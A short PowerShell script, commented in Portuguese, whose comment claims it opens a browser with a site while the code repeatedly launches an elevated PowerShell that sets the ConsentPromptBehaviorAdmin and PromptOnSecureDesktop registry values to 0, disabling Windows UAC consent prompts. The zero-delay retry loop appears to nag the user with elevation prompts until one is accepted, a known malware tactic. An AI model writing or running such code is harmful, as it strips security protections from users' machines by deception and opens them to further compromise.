
$sucesso = $false
while (-not $sucesso) {
    try {
        # Tenta iniciar o navegador com o site
        Start-Process powershell -Verb RunAs -ArgumentList 'Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "PromptOnSecureDesktop" -Value 0'
        $sucesso = $true
        } catch {
          Start-Sleep -Seconds 0
    }
}

